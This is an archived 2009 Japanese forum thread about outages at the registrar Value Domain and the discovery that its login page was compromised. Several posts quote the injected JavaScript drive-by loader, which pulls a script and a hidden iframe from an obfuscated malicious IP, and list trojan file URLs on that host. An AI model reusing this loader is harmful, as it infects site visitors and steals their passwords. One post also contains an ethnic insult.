VALUE DOMAINってどうよ？ part33

[表示 : 全て最新50 1-99 101- 201- 301- 401- 501- 601- 701- 2chのread.cgiへ]
Update time : 05/09 13:30 / Filesize : 155 KB / Number-of Response : 714
[このスレッドの書き込みを削除する]
[＋板最近立ったスレ＆熱いスレ一覧 : ＋板最近立ったスレ／記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

1 名前：名無しさん＠お腹いっぱい。 [2009/07/06(月) 06:18:47 0]: VALUE DOMAIN:バリュードメイン
https://www.value-domain.com/
サポート
https://www.value-domain.com/support.php
sb.xrea.com/forumdisplay.php?f=21

◆前スレ
VALUE DOMAINってどうよ？ part32
pc11.2ch.net/test/read.cgi/hosting/1239851317/
2 名前：名無しさん＠お腹いっぱい。 [2009/07/06(月) 06:19:49 0]: 過去スレ
VALUE DOMAINってどうよ？ part31
pc11.2ch.net/test/read.cgi/hosting/1233882549/
VALUE DOMAINってどうよ？ part30
pc11.2ch.net/test/read.cgi/hosting/1225092250/
VALUE DOMAINってどうよ？ part29
pc11.2ch.net/test/read.cgi/hosting/1220946385/
VALUE DOMAINってどうよ？ part28
pc11.2ch.net/test/read.cgi/hosting/1214506719/
3 名前：名無しさん＠お腹いっぱい。 [2009/07/06(月) 06:20:45 0]: Q. VDが潰れたら俺のドメインどうなるの？

A.https://access.enom.com/
レジストラがeNomの場合はここでドメイン情報を操作できる
パスワードはVDの管理画面から取得できるのでメモしておくべし
Key Systems管理のドメインの場合は不明、eNomに移管した方が良いかも

補足
VDが健在の場合は定期的にVDに保存されている情報が上書きされる
またeNomで設定するにはネームサーバをeNom提供のものへ変更する必要があるので
VDのネームサーバを使ってる人は最長48時間程度のタイムラグが生じる可能性がある

詳細
sb.xrea.com/showthread.php?t=4836

Q. 汎用JPの場合はどうなるの？

A. JPNICと傘下のJPRSがちゃんと次の業者を指定してくれる
指定業者にするもよし、好きな業者を選ぶこともできる

実例
jprs.jp/info/termination/20060814.html

Q. というかVDって倒産するの？

A. XREAやCOREのサービスが不安定で2chでの評価は下がっているけどサーバは常にほぼ満員
以下のページによるとデジロック名義にしているドメインだけで14万個以上あり
単純に考えてドメイン販売だけで億単位の売り上げがある

whois.domaintools.com/xrea.com
4 名前：名無しさん＠お腹いっぱい。 [2009/07/06(月) 06:21:31 0]: VDが逝く前にしておきたいドメイン防衛（gTLDの場合）

・eNom管理にする
　→VDの管理画面にログインできないときは https://access.enom.com/ から操作可能

・Whoisのドメイン管理者のメールアドレスは独自ドメイン以外の連絡のつくアドレスにする
　→移管手続きの連絡は、ここで設定されたアドレスで行われる
　→迷惑メールフィルタのあるメールがよい

・いつでも他事業者に移管できるよう、ドメインロックは外しておく
　→ドメインロックがかかっていると移管手続きができないことがある

・認証鍵(Authorization Info)はメモ、あるいはメールで送ってもらう
　→移管手続きには必要。今のうちにVDの管理画面から取得しておく

　参考
　　ttp://sb.xrea.com/showthread.php?t=4836
　　ttp://kazamidori.net/kaoru/web/crisis/
5 名前：名無しさん＠お腹いっぱい。 [2009/07/06(月) 06:22:43 0]: 前スレ保管庫
VALUE DOMAINってどうよ？ part32
mimizun.com/search/perl/dattohtml.pl?http://mimizun.com/log/2ch/hosting/pc11.2ch.net/hosting/kako/1233/12338/1239851317.dat
上記で読めないときは
www.geocities.jp/mirrorhenkan/url.html?u=http://pc11.2ch.net/test/read.cgi/hosting/1239851317/
6 名前：名無しさん＠お腹いっぱい。 [2009/07/06(月) 06:27:16 0]: はじめて正式スレを立てました。やったｗ

で、前の続きですが、
www.value-domain.com/login.php
午前4時30分ごろから、上のログインページにログインしようとすると、
ActiveXのインストールが実行しようとされていたのですが、
今はなおってますね。午前6時26分にActivX消えました。
なんだったのでしょうか。
7 名前：名無しさん＠お腹いっぱい。 [2009/07/06(月) 06:29:36 0]: 実行元を調べると、以下だった↓
ttp://110.165.41.103:888/dir/m.htm
そして、そのIPを調べると・・・
safeweb.norton.com/report/show?url=110.165.41.103
↑ウイルスだーー！クラックされたかと思ったのだが、
なんだったのか・・・
8 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 06:30:55 0]: 症状がこっちで確認できんから何もと言えんな…
自分の環境の問題って訳じゃないよな？
9 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 06:36:33 0]: 環境の問題だけでログインページだけアクティブＸでるのって
初めてだ。そういうこともあるんですね。ノートンクイックスキャンで調べたら
Cookieが検出されただけだったけど。
10 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 06:59:16 0]: VD・・潰れたら夜逃げってことないよな？
業務移管とかしないのかな・・。
どうせ止めるんだったら、
優秀な他の業者に業務移管して、さよならとしてほしいけど
11 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 07:58:50 0]: >>10
今のうちに>>4を見て、
自分でできることはやっておこうぜ、兄弟!!
12 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 09:28:58 P]: 汎用JPは安心を買っていると思えば安いな
13 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 09:58:01 0]: ns鯖は今日は7時くらいから調子いいじゃん珍しく
14 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 10:14:31 0]: どうせそのうちまた(ry
15 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 10:30:39 0]: いつも通り死んでますが？ｗ
16 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 12:56:34 0]: 現在、弊社の無料ネームサーバーが正常動作しないというご報告を多数いただいており、最優先業務として、担当部門がネームサーバー側の確認、および、接続回線(上位プロバイダーも含みます)の確認などの緊急対応を行っております。

この不具合のため、
　●独自ドメインへのアクセスが不安定
　●弊社サブドメインのアクセスが不安定
という症状が発生し、その結果、
　●メールが届いたり届かなかったりする
　●サイトにアクセスできたりできなかったりする
　●サーバーに設定しているドメインの設定が解除される
　●その他、サーバー、ドメインの各種不具合が発生する
という不安定な状況になっております。

また、直接的には無関係ではございますが、
　●レンタルカウンターの不具合
　●レンタルチャットの不具合
などの報告もいただいております。

現時点における回避策としましては、弊社以外のネームサーバー(転送有ドメインのenom社のネームサーバーも含みます)をご利用可能な場合は、そちらに切り替えていただくことになり、新たなDNS情報が浸透後(約24～48時間の後)にご利用可能な状態になるものと思われます。
しかしながら、弊社の無料サーバーのみをご利用の場合は、誠に申し訳ございませんが、担当部門による本症状の解決をお待ちいただく形になります。
(特にネームサーバー関係の不具合につきましては、完全に正常化されました場合であっても、おおむね48時間以内に徐々に浸透して安定していく形になり、その間、接続が不安定になる場合もございます)

不安定な状態が続いており、ご不便をおかけしておりますことを改めてお詫び申し上げますと共に、
　━━━━━━━━━━━━
　━━━━━━━━━━━━
　●本ご回答から【7日間】改善をお待ちいただく
　●再度のご連絡は【7日経過後も改善しない場合】にいただく
　━━━━━━━━━━━━
　━━━━━━━━━━━━
という形でのご協力をお願い申し上げます。
17 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 12:57:39 0]: ↑ 前スレより転載

障害発生より一ヵ月以上経ちますがその後ご機嫌いかがですか社員さん
18 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 13:13:09 0]: 変わりなく過ごしております
19 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 13:24:43 0]: 対応出来る技術者を捜してる
↓
とりあえず直させる
↓
技術者逃亡
↓
また捜す　←今ここ
20 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 13:28:47 0]: とっとと外注して復旧させろよ
21 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 14:01:14 0]: 外注は去年の広告鯖ウイルス混入事件で懲りてるんじゃない？
と言っても社内にそれなりの技術者いないなら外注しなきゃ仕方無いんだろうけど。
22 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 14:18:33 0]: 障害発生
↓
放置
↓
放置
↓
放置　←今ここ
23 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 15:32:04 0]: もうこりゃ復旧は無理だろ直せるもんならとっくに直ってるよ
24 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 15:35:48 P]: 食う
↓
寝る
↓
食う
↓
寝る
↓
100kg超え　←俺今ここ
25 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 15:39:15 0]: >>24
運動しろｗｗ
26 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 15:41:48 0]: >>6
ログインページ(SSL対応)にアクセスしたところ、
「SSLでないページが混在しています」のメッセージが出たのでおかしいなと思ったら、
ソースの326行目あたり、パスワード入力欄の下あたりに不審なJavaScriptが埋め込まれてるな

Googleキャッシュ(2009年7月3日 15:38:39 GMT)では上記のJavaScriptは存在しない
実際にウイルスかどうかは確認していないが、見た感じのソースは限りなくウイルス臭い
27 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 15:45:20 0]: ガチ末期ですか？
28 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 16:27:52 0]: なんかサポ板もバグってるみたいで収集つかなくなってるね
29 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 17:22:28 0]: >>6

ttp://1856317799:888/s.js
のことかな
確かにパスーワード入力欄の下に埋め込まれてる

1856317799のIPアドレスは110.165.41.103
>>7
のIPと一致するけど、
正常なスクリプトか、ウイルスか、パス抜きか・・・

なんかよく分からんが、ログインするのはヤメとくか
30 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 17:29:50 0]: なんだかなあ・・・
あっちもこっちもボロが出てるなぁ・・・
31 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 17:31:42 0]: >>29
これか・・・
<ＳＣＲＩＰＴＬＡＮＧＵＡＧＥ＝"ＪＡＶＡＳＣＲＩＰＴ">
ｖａｒｊｓ＝ｄｏｃｕｍｅｎｔ.ｃｒｅａｔｅＥｌｅｍｅｎｔ（"ｓｃｒｉｐｔ"）；
ｊｓ.ｓｒｃ＝ "ｈｔｔｐ：//１８５６３１７７９９：８８８/ｓ.ｊｓ"；
ｔｒｙ｛ｄｏｃｕｍｅｎｔ.ｇｅｔＥｌｅｍｅｎｔｓＢｙＴａｇＮａｍｅ（'ｈｅａｄ'）［０］.ａｐｐｅｎｄＣｈｉｌｄ（ｊｓ）；｝
ｃａｔｃｈ（ｅｘｐ）｛｝
ｊｓ＝ｎｕｌｌ；
</ＳＣＲＩＰＴ>

さっきログインしてしまった・・・orz
32 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 17:41:57 0]: s.jsの中身

／＊ｄｓａｄａｓｄａｄａｓｄａｓｄａｓｄａｓ＊／
ｉｆ（ｄｏｃｕｍｅｎｔ．ｃｏｏｋｉｅ．ｉｎｄｅｘＯｆ（”Ｏ＝”）＝＝－１）
｛
　　　　ｖａｒ　ｊｓ　＝　ｄｏｃｕｍｅｎｔ．ｃｒｅａｔｅＥｌｅｍｅｎｔ（’ｉｆｒａｍｅ’）；
　　　　ｊｓ．ｓｒｃ　＝　”ｈｔｔｐ：￥／￥／０ｘ６ＥＡ５２９６７：８８８／ｄｉｒ／ｓｈｏｗ．ｐｈｐ”；
　　　　ｊｓ．ｗｉｄｔｈ＝０；
　　　　ｊｓ．ｈｅｉｇｈｔ＝０；
　　　　ｔｒｙ　｛ｄｏｃｕｍｅｎｔ．ｇｅｔＥｌｅｍｅｎｔｓＢｙＴａｇＮａｍｅ（’ｈｅａｄ’）［０］．ａｐｐｅｎｄＣｈｉｌｄ（ｊｓ）；｝
　　　　ｃａｔｃｈ（ｅｘｐ）｛｝
　　　　ｊｓ　＝　ｎｕｌｌ；

ｖａｒ　ｅｘｐｉｒｅｓ＝ｎｅｗ　Ｄａｔｅ（）；
ｅｘｐｉｒｅｓ．ｓｅｔＴｉｍｅ（ｅｘｐｉｒｅｓ．ｇｅｔＴｉｍｅ（）＋２４＊６０＊６０＊１０００）；
ｄｏｃｕｍｅｎｔ．ｃｏｏｋｉｅ＝”Ｏ＝Ｙｅｓ；ｐａｔｈ＝／；ｅｘｐｉｒｅｓ＝”＋ｅｘｐｉｒｅｓ．ｔｏＧＭＴＳｔｒｉｎｇ（）；
｝／＊ｄａｓｄａｄａｄｓａｄａｓｄａｓ＊／
33 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 17:44:36 0]: 何これpass抜きか何か？
34 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 17:45:36 0]: safeweb.norton.com/report/show?name=110.165.41.103

Norton セーフウェブが 110.165.41.103 を分析して安全性とセキュリティの問題を調べました。下に示すのは見つかった脅威のサンプルです。

見つかった脅威の合計: 8

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/d6.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/en.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/d7.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/d9.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/fd.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/wa.dll

脅威名: Trojan.Dropper
場所: tp://110.165.41.103:888/dir/yg.dll

脅威名: Bloodhound.Exploit.193
場所: tp://110.165.41.103:888/swf/ia115-2.swf
35 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 17:51:16 0]: このセキュリティの甘さは何なんだお？
36 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 17:53:58 0]: 完全に投げ出したか
37 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 17:58:22 P]: 俺のガマン汁もそろそろ限界だ。
38 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 17:58:57 0]: これは
www.value-domain.com/
が乗っ取られたと解釈した方がいいのか？
39 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:05:00 0]: wikiwikiもやられてるみたいだな。GENO系統だろ。
ここの管理者が感染してFTPパス抜かれたら被害すごいことになるんじゃね？
40 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:11:01 0]: どうりで今日はデジロ社員が2ch工作してない訳だｗ
多分今頃、事務所は修羅場なんだろｗ
41 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:11:59 0]: かんべんしてよマジで
IEだとデフォルトのセキュリティ設定で警告が出てくれるけど、Firefoxだと警告すら出ないから気がつかない
42 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:13:29 0]: 大丈夫かよデジロ
43 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:16:25 0]: >>40
多分、社員はまだ気がついていないんじゃないかな
javascriptを削除するくらい数分でできるはず・・・社員がサーバーへのアクセス権限を失っていたら違う意味でやばいがね
44 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:28:27 0]: もしパス抜かれてたら、パス変更したら大丈夫なの？
45 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:28:31 P]: そもそも書き換えられたことが問題。
46 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:38:47 0]: 一時対応でとりあえずログインページは差し替えなきゃいけないだろ常考
差し替えたら取れなくなる資料は今のうちに取っておいて、
あとは原因追究、恒久的対応だろ
47 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:38:49 0]: 初心者的質問ですまんのだが、>>29にあるようなURLでどうして接続できるの？
あと、そのURLの謎の数字1856317799から、どうやってIPアドレスが辿れるの？
教えてエロい人。
48 名前：名無しさん＠お腹いっぱい。 [2009/07/06(月) 18:39:08 0]: とりあえず、マスコミに報告だ。

そうでもしなきゃ、隠蔽するだろ、ここ。
49 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:40:48 0]: >>47
1856317799　=　0x6EA52967　=　110.165.41.0
50 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:41:30 0]: すまん、

1856317799 = 0x6EA52967 = 110.165.41.103

か
51 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:52:04 0]: 0xの意味が理解できてないですけど、仕組みは分かりました。エロい人ありがとう。
ネット始めて10年にもなるのに、こんな表記の方法があるなんて恥ずかしながら知らなかったｗ
スレ汚し失礼しました。
52 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 18:57:31 0]: こんな表記はスパムやウイルスのフィルターをかいくぐる目的以外では
まず使われないからな
53 名前：sage [2009/07/06(月) 19:00:14 0]: >>51
なにしろマイクロソフトもうっかりしていて、IEの脆弱性になっていたくらいだからな。
54 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:01:56 0]: 0xではじまるのは16進数
55 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:02:50 0]: ところで、ns1-3.value-domain.com がひけないんだが、俺だけ？
56 名前：名無しさん＠お腹いっぱい。 [2009/07/06(月) 19:04:48 0]: 110.165.32.0/19は香港のアドレスブロックか
相変わらず中国人はクソ以下だな
57 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:05:58 0]: ns2が引けないな。1と3は引ける
58 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:08:30 0]: >>55
そんなのもう5月の終わりからだぞｗ
59 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:09:29 0]: ネームサーバも酷いな、とりあえずenomにして
あとはポイントを全部延長して使い切ってから他へ逃げる準備しとく
60 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:11:26 0]: しっかし、これだけ対応悪いと、
過去に隠蔽された情報漏洩やハッキング被害がｲﾊﾟｰｲあるのでは？と疑いたくなる。
61 名前：名無しさん＠お腹いっぱい。 [2009/07/06(月) 19:13:01 0]: とりあえず、ITMediaとGIGAZINEには、このスレを報告しといた。

GIGAZINE、期待してるよ。
62 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:14:05 0]: >>51
1856317799 = 110*256^3 + 165*256^2 + 41*256 + 103

0xは16進数を表す. 256=0x100だから, 16進で表せば2桁ごとに分解できる：

0x6EA52967 → 0x6E 0xA5 0x29 0x67
0x6E = 110
0xA5 = 165
0X29 = 41
0x67 = 103
63 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:17:27 0]: >>62
もういいって
ping 1856317799
とでも打てばすぐに分かることだし
64 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:19:21 0]: 惰性のみでM調教受け続けてきましたがさすがにもう無理です。
ごめんなさいドSデジロご主人様。
65 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:20:43 0]: ・・・ns1, ns2, ns3、すべてなにも帰ってこないぞ。
66 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:24:00 0]: >>65

つ>>16

先月1日あたりからアナウンスも一切無くずっと放置だよ
67 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:28:58 P]: とりあえず垢のパスは変えた方がいいのかな？どうなのかな？
68 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:31:50 0]: おちおちコンパネにログインすらできんってどうよ
移管もできねーじゃん
69 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:32:13 0]: >>66

これって死にッぱなし・・・じゃないよね？
だったらHPもメールも動かなくなるわけだし。
70 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:35:33 0]: >>69
orz.2ch.ioとかの登録されているアドレスじゃないと何も返って来ないぞ。
71 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:44:32 P]: 知らずにログインしてた…
念のためJavaSciprt無効化してからログインしてパスワード変更したよ。
72 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 19:57:50 0]: >>67
コンパネのパスを抜かれるって事はxreaのログイン情報から
メールのパスワードまで全部つながって見えるって事だから
とりあえず、JavaSciprtをoffにしてパスワードを変更した。
73 名前：72 mailto:sage [2009/07/06(月) 20:04:17 0]: 追加。
よく考えたらxreaどころじゃねぇ、
抜かれたパスワードからさらに他のパスワードに換えられたら、
こっちが何も出来ないまま、nsの変更どころかドメインを他人に移籍まで自由に出来るって事だ。
ログイン履歴をメモしておかないとな。
自分が寝ているハズの時間のログイン記録があるかもよ。
74 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 20:07:31 0]: わざわざ今ログインしてる人って頭ＸＸＸＸＸ
75 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 20:15:16 0]: 改ざんされてる割には
あまり騒いでないな
76 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 20:27:01 0]: JavaScriptを埋め込めるってことは、ログイン情報がポストされるPHPを改ざんすることも可能では？
つまり、JavaScriptを無効にしたところで、受け側のPHPの処理を信用できないのでログインは冒険だってことだ。
今はログインせずに、アナウンスを待つよりほかない。
77 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 20:29:44 0]: 他社で取得したco.jpドメイン運用しているんだけど、
NS1-3.VALUE-DOMAIN.COMを指定しちゃだめってこと？
78 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 20:31:10 0]: まさか本当にGENO系？
それならvalue-domain.comのFTPパス抜かれたってことか
最悪だ
79 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 20:36:44 0]: GENO系かどうかはわからないけど、login.phpが改竄されたってことは
少なくともftpの垢パスが漏れていると言う事実は変わらない。
もしかしたらもっと上位の垢パスの可能性だってある。
80 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 20:58:10 0]: ログインにトロイ埋め込まれてて、香港のサーバになんか飛ばしてるのか
これ、どう処理するんだろ
適当にパスワード変更してください、って告知して、また１００日無料期間追加程度で終わるのかな
81 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 21:49:42 0]: やばいよよばいよ
82 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 21:52:07 0]: まだ直ってないの?
83 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:12:14 0]: >>32のs.jsって本当にあるね……
俺、javascriptってよくわかんないんだけど、
ようするに、ログインしたら、ログインページのheadタグの後に、別のサーバのshow.phpってやつを差し込まれて何かされてるってこと？
84 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:14:53 0]: この先いったいどうなることやら
85 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:20:19 P]: www.value-domain.com/login.php

<SCRIPT LANGUAGE="JAVASCRIPT">
var js = document.createElement("script");
js.src = "1856317799:888/s.js";
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;
</SCRIPT>

https://www.value-domain.com/login.php
<SCRIPT LANGUAGE="JAVASCRIPT">
var js = document.createElement("script");
js.src = "1856317799:888/s.js";
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;
</SCRIPT>

当たり前だけ両方あるな
86 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:27:49 P]: s.jsの中身

/*dsadasdadasdasdasdas*/
if(document.cookie.indexOf("O=")==-1)
{
var js = document.createElement('iframe');
js.src = "http:\/\/0x6EA52967:888/dir/show.php";
js.width=0;
js.height=0;
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;

var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="O=Yes;path=/;expires="+expires.toGMTString();
}/*dasdadadsadasdas*/

http:\/\/0x6EA52967:888/dir/show.php
↓
110.135.41.103/dir/show.php
87 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:31:58 0]: To: 85-86

>>31-32がなぜわざわざ全角にしたのか, >>34がなぜhttpでなくtpにしたのか,
考えてみよう.
88 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:33:17 0]: >>85
>>86
既出
上で書いてあることをいちいち書き込まなくてよろしい
しかも香港鯖にリンクを貼るなや
89 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:40:35 0]: ウィルスURLを張るのは普通に通報対象です
90 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:46:18 0]: で、肝心のデジロは把握してるの？
91 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:49:31 0]: 把握していないのでは？
＜script＞～＜/script＞を削除するくらい一瞬で終わる
92 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:51:23 0]: 誰かが魚拓とってくれたみたいだ。

ttp://s03.megalodon.jp/2009-0706-1843-51/https://www.value-domain.com/login.php
93 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:52:08 0]: 試しに問題のURLを確認してみた

問題の飛ばされる先のｍ.ｈｔｍに、ノーガードで突っ込んでみると、
XPだと、
ドライブ:/Documents and Settings/ユーザ名/Application Data
のフォルダの中に、a.exeというファイルがコピーされ、regeditいじってたら、気がついたら消えてた。実行されたのだろうか

詳細は不明
何かがやられているのは確かだ

実験するのは自己責任で
94 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:56:05 0]: つーことは、ログインするとパスが抜かれるのではなく、
ログインページを開くだけで感染するってこと？
95 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 22:59:41 0]: >>93に追記

ログをおったら、Keyloggerを検知した
やはりパスワード抜きで確定だと思う
96 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 23:06:19 0]: 要は　javascript 実行させない環境で見れば
問題ないのかな

普段はFireFox+ NoScriptで普段はjavascript
実行させないようにしてるけど・・・
97 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 23:07:53 0]: >>95に追記

カスペルスキーを実行させながら再実験するとこんな感じになった
そんなスクリーンショット
ttp://www.dotup.org/uploda/www.dotup.org209036.jpg

これは酷い
98 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 23:12:33 0]: login.phpに＜script＞を埋め込むことができるなら、
login.phpのログイン時の処理にも細工がしてある可能性もある

JavaScriptを無効にしていても、php内部の処理まではどうなっているのか分からないので、ログインしない方が無難
99 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 23:13:36 P]: >>93
踏んだけどなかったなぁ
そもそもそのURL鯖落ちしてないか？
100 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 23:16:19 0]: ttps://www.value-domain.com/login.php
にアクセスするだけで感染？
101 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 23:19:14 0]: >>98
確かにそうだね
しかしそろそろドメインの更新できないと困る・・・

しかも他ではあんまり扱ってないドメインだから
移管するのも面倒だし
102 名前：名無しさん＠お腹いっぱい。 mailto:sage [2009/07/06(月) 23:22:45 0]: Windows以外のOSかVistaでアクセスした方がいいね

[ 続きを読む ] / [ 携帯版 ]

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef